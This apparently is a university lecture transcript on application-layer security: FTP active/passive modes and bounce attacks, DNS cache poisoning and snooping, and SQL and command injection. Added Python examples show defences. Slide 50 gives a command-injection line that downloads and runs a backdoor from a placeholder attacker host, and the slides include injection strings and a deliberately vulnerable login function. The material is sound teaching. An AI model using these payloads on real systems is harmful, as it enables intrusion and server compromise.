
Application Layer Security


Presentation Transcript


  1. Application Layer Security Lecture 8 Supakorn Kungpisdan supakorn@mut.ac.th NETE4630

  2. Outline
  • FTP Security
  • DNS Security
  • Web Application Security

  3. FTP Security Issues
  • All traffic is transmitted in clear text
  • Weak configuration on FTP allows brute force and dictionary attacks
  • Anonymous access may be enabled on the FTP server
  • If file permissions are not set, an anonymous user may be able to read, overwrite, or delete files, leading to loss of confidentiality, integrity, and availability of data
  • If anonymous access is being used on a server, make sure that the proper restrictions are enforced for this user

  4. Active FTP
  • The client connects from a random unprivileged port (N > 1023) to the FTP server's command port, port 21. The client also sends the FTP command PORT N+1 from port N to port 21 at the FTP server. The client then starts listening on port N+1
  • The server returns the response from port 21 to port N at the client
  • The server will then connect back to the client's specified data port from its local data port (port 20) to the client at port N+1
  Ref: http://slacksite.com/other/ftp.html

  5. Firewall vs. Active FTP
  • From the server-side firewall's standpoint, to support active mode FTP the following communication channels need to be opened:
    • FTP server's port 21 from anywhere (client initiates connection)
    • FTP server's port 21 to ports > 1023 (server responds to client's control port)
    • FTP server's port 20 to ports > 1023 (server initiates data connection to client's data port)
    • FTP server's port 20 from ports > 1023 (client sends ACKs to server's data port)

  6. Active FTP (cont.)
  [Figure: FTP client debug session showing the PORT command. Client port = (14*256)+178 = 3762. Red text is client input, black text is server output.]

  7. Active FTP (cont.)
  • The client's command port contacts the server's command port (port 21) and sends the command PORT 1027 (N+1).
  • The server sends an ACK back from its port 21 to the client's command port (port 1026, i.e. port N).
  • The server initiates a connection from its local data port (port 20) to the data port the client specified earlier (port 1027).
  • The client sends an ACK back from port 1027 to the server's port 20.

  8. Problems of Active FTP
  • The FTP client doesn't make the actual connection to the data port of the server
  • The FTP client simply tells the server what port it is listening on (N+1) and waits for the server to connect back to the specified port on the client
  • From the client-side firewall's standpoint, this appears to be an outside system initiating a connection to an internal client
  • This connection may be blocked
  • Because the server initiates the data connection, the server may connect to a different client

  9. Passive FTP
  • To solve the problem of active FTP, use passive FTP
  • When opening an FTP connection, the client opens two random unprivileged ports locally (N > 1023 and N+1).
  • Port N contacts the server on port 21, but instead of then issuing a PORT command and allowing the server to connect back to its data port, the client will issue the PASV command.
  • The server then opens a random unprivileged port (P > 1023) and sends the PORT P command back to the client.
  • The client then initiates the connection from port N+1 to port P on the server to transfer data.

  10. Firewall vs. Passive FTP
  • From the server-side firewall's standpoint, to support passive FTP, the following communication channels need to be opened:
    • FTP server's port 21 from anywhere (client initiates connection)
    • FTP server's port 21 to ports > 1023 (server responds to client's control port)
    • FTP server's ports > 1023 from anywhere (client initiates data connection to random port specified by server)
    • FTP server's ports > 1023 to remote ports > 1023 (server sends ACKs (and data) to client's data port)

  11. Passive FTP (cont.)
  [Figure: passive FTP session; the server specifies the data port number.]

  12. Passive FTP
  • The client contacts the server on the command port (port N=1026) and issues the PASV command.
  • The server then replies with PORT 2024, telling the client which port it is listening on for the data connection.
  • The client then initiates the data connection from its data port (N+1=1027) to the specified server data port (port 2024).
  • The server sends back an ACK (from its port 2024) to the client's data port (port 1027).
  You can see that the client initiates the data connection with the FTP server, so it will not be blocked by the firewall

  13. Problems of Passive FTP
  • The FTP server needs to allow remote connections to high-numbered ports on the server.
  • Fortunately, many FTP daemons, including the popular WU-FTPD, allow the administrator to specify the range of ports which the FTP server will use.
  • Some FTP clients do not support passive mode.

  14. FTP Bounce Scan
  • The FTP bounce attack uses a third workstation to act as a proxy between the nmap host and the destination station.
  • With passive FTP, a user could send a PORT command to an FTP server that would direct the data towards a completely different host!
  • The FTP bounce attack takes advantage of these poorly-configured FTP servers (no control over ranges of FTP ports)
  • The data is BOUNCED from the FTP server to the target host

  15. FTP Bounce Scan (cont.)
  [Figure: FTP bounce scan exchange for a closed port and for an open port.]

  16. Advantages of FTP Bounce Scan
  • The FTP bounce attack can scan "through" a firewall.
  • The FTP bounce attack uses standard FTP functionality. Nmap does not require specialized packet configurations or changes to the FTP protocol.
  • Therefore, the FTP bounce attack does not require any privileged access.

  17. Disadvantages of FTP Bounce Scan
  • The FTP bounce attack relies on the availability of an FTP server that allows a PORT command to redirect the data connection to a third device.
  • Most FTP servers' default configuration protects against this use of the PORT command

  18. Other FTP Bounce Attack
  • When using active FTP, a client uses the PORT command to specify the IP address and port number that the server should connect to for the data connection
  • An attacker with access to an FTP server can bounce through the server by specifying someone else's IP address
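  The following Python is an added example, not part of the lecture slides: it parses the RFC 959 PORT argument (h1,h2,h3,h4,p1,p2, with port = p1*256+p2, the arithmetic shown on slide 6) and then applies the server-side check that removes the bounce behaviour of slides 14 to 18: an FTP daemon should only open a data connection to the address the control connection came from, and never to a privileged port. The sample PORT argument and the peer addresses are constructed for illustration.

```python
def parse_port_arg(arg: str) -> tuple[str, int]:
    """Parse the argument of an FTP PORT command (RFC 959 format h1,h2,h3,h4,p1,p2).

    Returns (ip, port). Raises ValueError on malformed input.
    """
    parts = arg.strip().split(",")
    if len(parts) != 6:
        raise ValueError("PORT needs six comma-separated decimal fields")
    nums = [int(p) for p in parts]
    if any(not 0 <= n <= 255 for n in nums):
        raise ValueError("each PORT field must fit in one octet")
    ip = ".".join(str(n) for n in nums[:4])
    port = nums[4] * 256 + nums[5]   # high byte, low byte: (14*256)+178 = 3762 on slide 6
    return ip, port


def format_port_arg(ip: str, port: int) -> str:
    """Inverse of parse_port_arg: build the h1,h2,h3,h4,p1,p2 string a client sends."""
    if not 0 <= port <= 65535:
        raise ValueError("port out of range")
    return ",".join(ip.split(".") + [str(port // 256), str(port % 256)])


def port_command_is_acceptable(arg: str, control_peer_ip: str) -> tuple[bool, str]:
    """Server-side check a hardened FTP daemon applies before honouring PORT.

    The bounce attack depends on the server opening its data connection to
    whatever address the client names. Refusing addresses that differ from the
    control-connection peer, and refusing privileged ports (< 1024), removes the
    proxying behaviour the scan relies on. Returns (allowed, reason).
    """
    try:
        ip, port = parse_port_arg(arg)
    except ValueError as e:
        return False, f"malformed PORT: {e}"
    if ip != control_peer_ip:
        return False, f"PORT address {ip} differs from control peer {control_peer_ip} (bounce attempt)"
    if port < 1024:
        return False, f"PORT to privileged port {port} refused"
    return True, f"data connection to {ip}:{port} permitted"


# Constructed samples (hypothetical addresses): the lecture's p1,p2 = 14,178
# from a client at 192.168.1.10, and a PORT naming a third host instead.
SAMPLE_PORT_ARG = "192,168,1,10,14,178"
BOUNCE_PORT_ARG = "203,0,113,9,0,80"

if __name__ == "__main__":
    print(parse_port_arg(SAMPLE_PORT_ARG))
    for arg in (SAMPLE_PORT_ARG, BOUNCE_PORT_ARG, "192,168,1,10,0,22", "1,2,3"):
        print(arg, "->", port_command_is_acceptable(arg, "192.168.1.10"))
```

The same two rules (peer address must match, no privileged ports) are what modern FTP daemons apply by default, which is why slide 17 notes that bounce scans rarely work against current servers.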

  19. Outline
  • FTP Security
  • DNS Security
  • Web Application Security

  20. Domain Name System
  • DNS is a distributed database that holds the information for mapping host names to IP addresses
  • DNS uses both UDP and TCP.
  • UDP is typically used for queries, unless the lookup or response is greater than 512 bytes
  • TCP is used for large lookups and for zone transfers
  • Integrity and availability of DNS are critical for the health of the Internet. It is used in conjunction with almost every other protocol on the Internet
  • Availability was considered while designing DNS; however, security was not

  21. DNS Request

  22. DNS Response

  23. DNS Lookup Process
  [Figure: Host A and Host A's authoritative name server, steps 1 and 2.]
  • Host A sends a request to the resolver (at Host A). It checks the local cache and may check the hosts file
  • The resolver at Host A forwards the request to its authoritative name server

  24. DNS Non-recursive Query
  [Figure: Host A, Host A's authoritative name server, Host B's authoritative name server and Host B, steps 1 to 5.]
  3. Find the address of the authoritative name server of the requested domain and return its address to the resolver

  25. DNS Recursive Query
  [Figure: Host A, Host A's authoritative name server, Host B's authoritative name server and Host B, steps 1 to 5.]
  3. The server finds the address of the authoritative name server of the requested domain, passes the request on to that server, and returns a response to the resolver

  26. DNS Hierarchy (Recursive Query)
  [Figure: DNS hierarchy including the .com TLD server, steps 1 to 8; step 1 is a recursive query, step 2 a non-recursive query.]
  What happens if (2) is a recursive query?

  27. DNS Utilities
  • Most OSes come with a tool called nslookup, capable of querying DNS servers for various types of information
  • The dig tool that comes with UNIX has similar capabilities

  28. Name-to-IP Lookup

  29. MX Lookup with nslookup

  30. DNS Security Issues
  • DNS lacks authentication and integrity checking
  • Due to the lack of authentication, attackers can spoof DNS messages to perform a variety of attacks
  • Due to the lack of integrity checking, attackers can intercept and modify messages in transit

  31. DNS Zone Transfer
  • For redundancy, administrators deploy both primary and secondary name servers that contain the same DBs
  • To keep its DB synchronized with the primary name server, the secondary name server periodically connects to the primary name server on port 53/TCP and grabs the DNS records
  • This process is called a Zone Transfer

  32. DNS Information Gathering
  • DNS can provide a great deal of information about the target network and its hosts
  • One of the common insecure configurations with DNS is allowing anyone to perform zone transfers on one of a domain's DNS servers
  • If an attacker can perform a zone transfer with the primary or secondary name servers for a domain, he/she will be able to view all DNS records for that domain
  • See a demo at http://www.mindterra.com/blog/?p=179
  • Solved by specifying the IP addresses that are allowed to perform zone transfers, or by using Transaction Signature (TSIG)

  33. DNS Cache Poisoning
  • Both DNS clients and servers cache responses for a period of time in order to increase performance and reduce network traffic
  • If an attacker can spoof a response for a DNS request, he/she may be able to contaminate the DNS cache with an incorrect record
  • This process is known as DNS cache poisoning
  • The only real defense built into DNS is the use of a random Transaction ID and source port
  • Some versions of BIND use Transaction IDs that are not sufficiently random, and some use sequential Transaction IDs
  • BIND 9 Cache Poisoning

  34. DNS Cache Poisoning (cont.)
  • The attacker sends a large number of recursive requests for www.syngress.com to ns.hackthestack.com
  • ns.hackthestack.com forwards the requests to other name servers until it eventually sends the requests to Syngress's name server ns.syngress.com
  • ns.hackthestack.com is now expecting to receive a large number of replies from ns.syngress.com
  • Before they arrive, the attacker could flood ns.hackthestack.com with a large number of packets spoofed from ns.syngress.com
  • The attack will be successful if the spoofed packets have the correct combination of TID and port number

  35. DNS Cache Snooping
  • The recursion bit tells the DNS server whether the query is recursive or non-recursive
  • The remote DNS server may answer queries for third-party domains which do not have the recursion bit set
  • This may allow a remote attacker to determine which domains have recently been resolved via this name server, and therefore which hosts have been recently visited
  Ref: www.rootsecure.net/content/downloads/pdf/dns_cache_snooping.pdf

  36. Possible Scenario
  • If an attacker was interested in whether your company utilizes the online services of a particular bank, they can use this attack to build a statistical model regarding company usage of that bank
  • This attack can also be used to find B2B partners, web-surfing patterns, external mail servers, and more...
  • Two techniques are available: using non-recursive queries and using recursive queries
  • Some DNS servers allow both types of queries, but some allow only recursive queries to be made

  37. DNS Cache Snooping with Non-recursive Queries
  • The attacker queries ns1.tvcabo.pt for www.sidestep.pt
  • ns1.tvcabo.pt does not have the entry in its local cache. It returns no answer, but gives a list of .pt TLD name servers for further queries

  38. DNS Cache Snooping with Non-recursive Queries (cont.)
  • The fact that ns1.tvcabo.pt does not have the entry in its local cache means that no host using ns1.tvcabo.pt has communicated with www.sidestep.pt before
  • Thus, this organization does not use services provided by www.sidestep.pt

  39. DNS Cache Snooping with Non-recursive Queries (cont.)
  • If the attacker executes the same query again, check the response
  • This time ns1.tvcabo.pt has cached the entry, so it returns the answer

  40. DNS Cache Snooping with Recursive Queries
  • Used to determine with some degree of precision (not 100% sure) whether a given record is present in the cache
  • However, this will pollute the cache
  • If a given record is not present in the cache, it will be after the first query is made
  • This is because a recursive query will always return the answer for the given record

  41. DNS Cache Snooping with Recursive Queries
  • Try to see if www.sidestep.pt was cached in ns1.tvcabo.pt
  • Query ns1.tvcabo.pt for www.sidestep.pt and record the TTL

  42. DNS Cache Snooping with Recursive Queries (cont.)
  • Then query ns.sidestep.pt (Sidestep's authoritative DNS) for www.sidestep.pt and compare the TTL

  43. DNS Cache Snooping with Recursive Queries (cont.)
  • The TTL for www.sidestep.pt at ns1.tvcabo.pt (6458) is much lower than the initial TTL (86400) (the TTL at ns.sidestep.pt)
  • This is a good indicator that the answer was already cached at ns1.tvcabo.pt
  • Another way to look for cached responses is to observe the time that the query takes to process
  • If the query time is approximately equal to the round trip time (RTT) of a packet to the server, then the answer might have been already present in the cache
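  The following Python is an added example, not part of the lecture: it shows the protocol detail behind slides 35 to 43 (the RD bit in the DNS header that distinguishes a recursive from a non-recursive query, and the TTL comparison of slide 43) and, from the resolver operator's side, the detection a recursive resolver can apply: a query with RD clear arriving from outside the networks the resolver serves is the signature of cache snooping. The wire format follows RFC 1035; the query list, source addresses, and internal prefixes are constructed, and the name www.sidestep.pt and the TTL values 6458 and 86400 are taken from the slides.

```python
import struct


def build_query(name: str, qtype: int = 1, txid: int = 0x1234,
                recursion_desired: bool = True) -> bytes:
    """Build a DNS query in wire format (RFC 1035 header + one question).

    recursion_desired=False clears the RD bit, which is what the non-recursive
    snooping technique relies on: the server then answers only from its cache
    instead of resolving on the client's behalf.
    """
    flags = 0x0100 if recursion_desired else 0x0000   # RD is bit 8 of the flags word
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)  # QDCOUNT=1
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.rstrip(".").split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, 1)      # QCLASS IN


def parse_flags(msg: bytes) -> dict:
    """Extract the header flag bits an operator cares about."""
    _txid, flags = struct.unpack("!HH", msg[:4])
    return {
        "qr": bool(flags & 0x8000),   # 1 = response, 0 = query
        "rd": bool(flags & 0x0100),   # recursion desired
        "ra": bool(flags & 0x0080),   # recursion available
        "rcode": flags & 0x000F,
    }


def query_name(msg: bytes) -> str:
    """Decode the QNAME of the first question (queries carry no compression pointers)."""
    i, labels = 12, []
    while msg[i]:
        n = msg[i]
        labels.append(msg[i + 1:i + 1 + n].decode("ascii"))
        i += 1 + n
    return ".".join(labels)


def looks_cached(observed_ttl: int, authoritative_ttl: int, margin: float = 0.05) -> bool:
    """TTL heuristic from slide 43: the authoritative server returns the full
    TTL, a cache returns whatever is left of it, so an observed TTL well below
    the authoritative value means the record was already cached."""
    return observed_ttl < authoritative_ttl * (1 - margin)


def flag_snooping(queries: list, internal_prefixes: tuple) -> list:
    """Detection over (source_ip, raw_query) pairs as seen by a recursive resolver.

    A query with RD clear from an address outside the served networks is
    reported. A hardened resolver additionally refuses such queries outright
    (in BIND, allow-recursion and allow-query-cache limited to internal ranges).
    """
    alerts = []
    for src, raw in queries:
        f = parse_flags(raw)
        if f["qr"]:
            continue                                   # responses are not queries
        if not f["rd"] and not src.startswith(internal_prefixes):
            alerts.append(f"{src} non-recursive query for {query_name(raw)}")
    return alerts


# Constructed sample: one external non-RD probe for the lecture's example name
# and one ordinary internal lookup. Addresses and prefixes are hypothetical.
SAMPLE_QUERIES = [
    ("198.51.100.7", build_query("www.sidestep.pt", recursion_desired=False)),
    ("10.0.0.25", build_query("www.sidestep.pt", recursion_desired=True)),
]
INTERNAL_PREFIXES = ("10.", "192.168.")

if __name__ == "__main__":
    print(build_query("www.sidestep.pt", recursion_desired=False).hex())
    print("cached?", looks_cached(6458, 86400))
    print(flag_snooping(SAMPLE_QUERIES, INTERNAL_PREFIXES))
```

Note that the recursive variant (slides 40 to 43) cannot be caught by the RD bit, since the probe looks like any ordinary lookup; there the only effective control is restricting recursion to the clients the resolver is meant to serve.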

  44. A Safer BIND Configuration

  45. Outline
  • FTP Security
  • DNS Security
  • Web Application Security

  46. Attacking Web Applications
  • The majority of vulnerabilities are caused by a lack of proper input validation by the application before processing user-supplied data
  • This can allow attackers to disclose information about the site, steal information from backend DBs, or execute binary code on the web server
  S. Kungpisdan

  47. SQL Injection
  • Many web applications rely on backend DBs for information storage and retrieval.
  • Sometimes a script will perform a DB query using input supplied from a web page, without verifying that the input does not contain any escape characters
  • Consider the following PHP:
    $query = "SELECT * FROM users WHERE username = '{$_POST['user']}' AND password = '{$_POST['pass']}'";
  • With the password field set to ' OR 1=1 ' the query that reaches the DB becomes:
    SELECT * FROM users WHERE username = 'bob' AND password = ' ' OR 1=1 ''
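  The following Python is an added example, not code from the lecture: it places the slide's string-built query beside its parameterized form so the difference can be observed on a real database engine. The users table is constructed in memory with sqlite3 (a stand-in for the lecture's backend DB); the injected value uses the ' OR '1'='1 form, which yields a syntactically complete statement, rather than the exact characters shown on the slide.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for the backend DB."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('bob', 'correct horse')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, user: str, password: str) -> bool:
    """Mirrors the slide's PHP: form fields spliced straight into the SQL text.

    A quote character in the input ends the string literal early, so the rest
    of the input is parsed as SQL and changes the meaning of the WHERE clause.
    """
    query = (f"SELECT * FROM users WHERE username = '{user}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, user: str, password: str) -> bool:
    """Hardened form: placeholders. The driver passes the values to the engine
    separately from the statement text, so quote characters in the input are
    just data and cannot alter the statement's structure."""
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (user, password)).fetchone() is not None


INJECTED_PASSWORD = "' OR '1'='1"   # constructed test input, not a real credential

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, injected input :", login_vulnerable(db, "bob", INJECTED_PASSWORD))
    print("parameterized, same input  :", login_parameterized(db, "bob", INJECTED_PASSWORD))
    print("parameterized, real password:", login_parameterized(db, "bob", "correct horse"))
```

Parameterization is the control; escaping the input by hand (the "escape characters" check the slide mentions) is fragile because the set of characters that matter depends on the DB engine and the query context.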

  48. Code Injection
  • Sometimes user-supplied strings are not properly checked for escape characters before being passed to commands as arguments
  • Consider a PHP script that takes a string supplied from a web page form and passes it to the nslookup utility

  49. Code Injection (cont.)
  • If the user supplies ;ls -la /, the script will execute the command line nslookup ;ls -la /, resulting in a listing of the root directory being printed out

  50. Code Injection (cont.)
  • wget and perl commands could be used to download and run a backdoor on the web server by supplying the following line to the script
  • ;wget http://attackersite/backdoor.pl;perl backdoor.pl
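  The following Python is an added example, not the lecture's PHP script: it shows why the nslookup wrapper of slides 48 to 50 fails and the two changes that fix it. The vulnerable version builds a single command line that a shell will split at ";", so the form field can append commands. The hardened version validates the field against a hostname allow-list pattern and then passes it as a separate argv element without invoking a shell, so the input can only ever be the name nslookup looks up. Function names and the sample inputs are this example's own; the hostname pattern is assumed to be the policy the application wants.

```python
import re
import subprocess

# Allow-list for what the form field may contain: DNS labels of letters,
# digits and hyphens, joined by dots, at most 253 characters in total.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def vulnerable_command_line(user_input: str) -> str:
    """What the slide's script hands to the shell: plain string concatenation.

    Returned rather than executed; a shell would split the result at ';'
    and run whatever follows the lookup as a second command.
    """
    return f"nslookup {user_input}"


def is_valid_hostname(value: str) -> bool:
    """Allow-list check: accept only syntactically valid hostnames."""
    return bool(HOSTNAME_RE.match(value))


def build_lookup_argv(user_input: str) -> list:
    """Hardened form: validate, then return an argv list for subprocess.

    Passing a list (and not setting shell=True) means no shell parses the
    arguments, so ';', '|', '&&' and friends have no special meaning.
    """
    if not is_valid_hostname(user_input):
        raise ValueError("input is not a valid hostname")
    return ["nslookup", user_input]


def run_lookup(user_input: str) -> str:
    """Run the validated lookup and return its output (requires nslookup on PATH)."""
    argv = build_lookup_argv(user_input)
    result = subprocess.run(argv, capture_output=True, text=True, check=False)
    return result.stdout


# Constructed sample inputs: a normal hostname and the slide's injected string.
GOOD_INPUT = "www.mut.ac.th"
BAD_INPUT = ";ls -la /"

if __name__ == "__main__":
    print(vulnerable_command_line(BAD_INPUT))
    print(build_lookup_argv(GOOD_INPUT))
    try:
        build_lookup_argv(BAD_INPUT)
    except ValueError as e:
        print("rejected:", e)
```

Both layers matter: the allow-list rejects the slide's payloads before anything runs, and the argv form removes the shell so that a value the regex does accept still cannot become a second command.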
